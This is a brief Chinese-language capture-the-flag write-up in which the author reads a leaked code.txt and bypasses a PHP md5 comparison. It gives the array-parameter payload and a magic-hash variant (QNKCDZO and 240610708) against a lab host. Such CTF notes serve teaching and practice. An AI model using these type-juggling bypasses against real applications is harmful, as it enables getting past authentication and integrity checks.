1:直接f12看看,发现code.txt,进去看看
2: url/code.txt界面,可能有md5绕过可能,PHP中MD5常见绕过_iczfy585的博客-CSDN博客_md5绕过
3:审计
就是说v1=v2,md5(v1)=md5(v2), v3 !=flag,(不等于),利用md5漏洞不能识别数组
4:构造payload:url/?v1[]=1&v2[]=2&v3[]=1
5:看到其他师傅的,有这样做的:利用v1v2值等md5值不等,v3不等于flag,
例如QNKCDZO和240610708,所以
http://114.67.175.224:17482/?v1[]=1&v2[]=2&v3[]=1改成XM这样///
http://114.67.175.224:17482/?v1=QNKCDZO&V2=240610708&v3[]=1
也嫩得到flag{}